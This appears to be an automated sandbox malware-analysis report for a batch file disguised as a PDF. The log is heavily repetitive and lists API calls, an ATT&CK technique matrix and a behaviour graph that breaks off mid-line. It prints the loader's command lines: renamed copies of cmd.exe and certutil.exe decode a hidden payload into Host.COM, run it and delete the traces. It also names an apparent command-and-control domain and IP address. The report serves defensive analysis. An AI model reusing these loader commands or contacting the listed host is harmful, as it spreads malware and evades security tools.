    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\Public\Libraries\Host.COMMemory allocated: 2AA0000 memory commit 450007040Jump to behavior
    Source: C:\Users\Public\Libraries\Host.COMMemory allocated: 2AA1000 memory commit 450179072Jump to behavior
    Source: C:\Users\Public\Libraries\Host.COMMemory allocated: 2ACD000 memory commit 450002944Jump to behavior
    Source: C:\Users\Public\Libraries\Host.COMMemory allocated: 2ACE000 memory commit 450351104Jump to behavior
    Source: C:\Users\Public\Libraries\Host.COMMemory allocated: 2B24000 memory commit 451014656Jump to behavior
    Source: C:\Users\Public\Libraries\Host.COMMemory allocated: 2C1E000 memory commit 450015232Jump to behavior
    Source: C:\Users\Public\alpha.exeAPI coverage: 8.3 %
    Source: C:\Users\Public\alpha.exeAPI coverage: 8.6 %
    Source: C:\Users\Public\kn.exeAPI coverage: 0.8 %
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF71967823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF71967823C
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719672978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF719672978
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719661560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF719661560
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7196635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF7196635B8
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719687B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF719687B4C
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF71967823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,6_2_00007FF71967823C
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF719672978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,6_2_00007FF719672978
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF719661560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,6_2_00007FF719661560
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7196635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,6_2_00007FF7196635B8
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF719687B4C FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF719687B4C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD16F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,7_2_00007FF68AD16F80
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD13100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF68AD13100
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD110C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF68AD110C4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD1234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,7_2_00007FF68AD1234C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACAC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,7_2_00007FF68ACAC6F8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,7_2_00007FF68ACBDBC0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD119F8 #359,FindFirstFileW,FindNextFileW,FindClose,7_2_00007FF68AD119F8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD11B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,7_2_00007FF68AD11B04
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACB5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,7_2_00007FF68ACB5E58
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF68ACBB3D8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,7_2_00007FF68ACBD4A4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC7D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68AC7D440
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACF3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,7_2_00007FF68ACF3674
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AA5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,11_2_02AA5908
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACF511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,7_2_00007FF68ACF511C
    Source: Host.COM, 0000000B.00000002.2573365210.00000000007DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
    Source: Host.COM, 0000000B.00000002.2573365210.000000000082B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: C:\Users\Public\Libraries\Host.COMAPI call chain: ExitProcess graph end node

    Anti Debugging

    barindex
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02ABF740 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,11_2_02ABF740
    Source: C:\Users\Public\Libraries\Host.COMProcess queried: DebugPortJump to behavior
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7196863FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,4_2_00007FF7196863FC
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AB8954 LoadLibraryW,GetProcAddress,FreeLibrary,11_2_02AB8954
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF71967823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF71967823C
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7196793B0 SetUnhandledExceptionFilter,4_2_00007FF7196793B0
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719678FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF719678FA4
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7196793B0 SetUnhandledExceptionFilter,6_2_00007FF7196793B0
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF719678FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF719678FA4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD44E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF68AD44E18
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD453E0 SetUnhandledExceptionFilter,7_2_00007FF68AD453E0

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACF7024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,7_2_00007FF68ACF7024
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\78326473_PDF.cmd" "C:\\Users\\Public\\Host.GIF" 3 Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10 Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\Host.COM C:\Users\Public\Libraries\Host.COMJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Host.GIF" / A / F / Q / S Jump to behavior
    Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\78326473_PDF.cmd" "C:\\Users\\Public\\Host.GIF" 3 Jump to behavior
    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10 Jump to behavior
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACE4AF4 GetSecurityDescriptorDacl,GetLastError,SetEntriesInAclW,SetSecurityDescriptorDacl,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,7_2_00007FF68ACE4AF4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACE4E88 DsRoleGetPrimaryDomainInformation,#357,AllocateAndInitializeSid,GetLastError,#357,AllocateAndInitializeSid,GetLastError,#357,#357,DsRoleFreeMemory,LocalFree,#357,LocalFree,LocalFree,LocalFree,7_2_00007FF68ACE4E88
    Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,4_2_00007FF7196751EC
    Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,4_2_00007FF719666EE4
    Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,4_2_00007FF719673140
    Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,6_2_00007FF7196751EC
    Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,6_2_00007FF719666EE4
    Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,6_2_00007FF719673140
    Source: C:\Users\Public\kn.exeCode function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,7_2_00007FF68AD43800
    Source: C:\Users\Public\Libraries\Host.COMCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,11_2_02AA5ACC
    Source: C:\Users\Public\Libraries\Host.COMCode function: GetLocaleInfoA,11_2_02AAA7CC
    Source: C:\Users\Public\Libraries\Host.COMCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,11_2_02AA5BD8
    Source: C:\Users\Public\Libraries\Host.COMCode function: GetLocaleInfoA,11_2_02AAA818
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719688654 GetSystemTime,SystemTimeToFileTime,4_2_00007FF719688654
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACF6CB4 ConvertStringSidToSidW,LookupAccountNameW,GetLastError,#359,LocalAlloc,#357,LocalAlloc,LookupAccountNameW,GetLastError,IsValidSid,LocalFree,LocalFree,7_2_00007FF68ACF6CB4
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF71966586C GetVersion,4_2_00007FF71966586C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC5227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,7_2_00007FF68AC5227C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC6E568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,7_2_00007FF68AC6E568
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC554A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,7_2_00007FF68AC554A0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC75648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,7_2_00007FF68AC75648
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire Infrastructure2
    Valid Accounts
    1
    Native API
    1
    DLL Side-Loading
    1
    DLL Side-Loading
    2
    Disable or Modify Tools
    OS Credential Dumping1
    System Time Discovery
    Remote Services11
    Archive Collected Data
    1
    Ingress Tool Transfer
    Exfiltration Over Other Network Medium1
    Data Encrypted for Impact
    CredentialsDomainsDefault AccountsScheduled Task/Job2
    Valid Accounts
    2
    Valid Accounts
    1
    Deobfuscate/Decode Files or Information
    LSASS Memory1
    Account Discovery
    Remote Desktop ProtocolData from Removable Media21
    Encrypted Channel
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)21
    Access Token Manipulation
    2
    Obfuscated Files or Information
    Security Account Manager1
    System Network Connections Discovery
    SMB/Windows Admin SharesData from Network Shared Drive2
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
    Process Injection
    1
    Install Root Certificate
    NTDS1
    File and Directory Discovery
    Distributed Component Object ModelInput Capture113
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Timestomp
    LSA Secrets35
    System Information Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading
    Cached Domain Credentials331
    Security Software Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
    Masquerading
    DCSync1
    Virtualization/Sandbox Evasion
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
    Valid Accounts
    Proc Filesystem1
    Application Window Discovery
    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
    Virtualization/Sandbox Evasion
    /etc/passwd and /etc/shadow1
    System Owner/User Discovery
    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
    Access Token Manipulation
    Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
    Process Injection
    Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562925 Sample: 78326473_PDF.cmd Startdate: 26/11/2024 Architecture: WINDOWS Score: 100 35 taksonsdfg.co.in 2->35 39 Found malware configuration 2->39 41 Antivirus detection for URL or domain 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 6 other signatures 2->45 8 cmd.exe 1 2->8         started        signatures3 process4 process5 10 Host.COM 8->10         started        14 extrac32.exe 1 8->14         started        17 alpha.exe 1 8->17         started        19 5 other processes 8->19 dnsIp6 37 taksonsdfg.co.in 108.170.55.202, 443, 49702, 49703 SSASN2US United States 10->37 51 Antivirus detection for dropped file 10->51 53 Multi AV Scanner detection for dropped file 10->53 55 Machine Learning detection for dropped file 10->55 63 2 other signatures 10->63 33 C:\Users\Public\alpha.exe, PE32+ 14->33 dropped 57 Drops PE files to the user root directory 14->57 59 Drops or copies certutil.exe with a different name (likely to bypass HIPS) 14->59 61 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 14->61 21 kn.exe 3 2 17->21         started        24 kn.exe 2 19->24         started        27 extrac32.exe 1 19->27         started        file7 signatures8 process9 file10 47 Registers a new ROOT certificate 21->47 49 Drops PE files with a 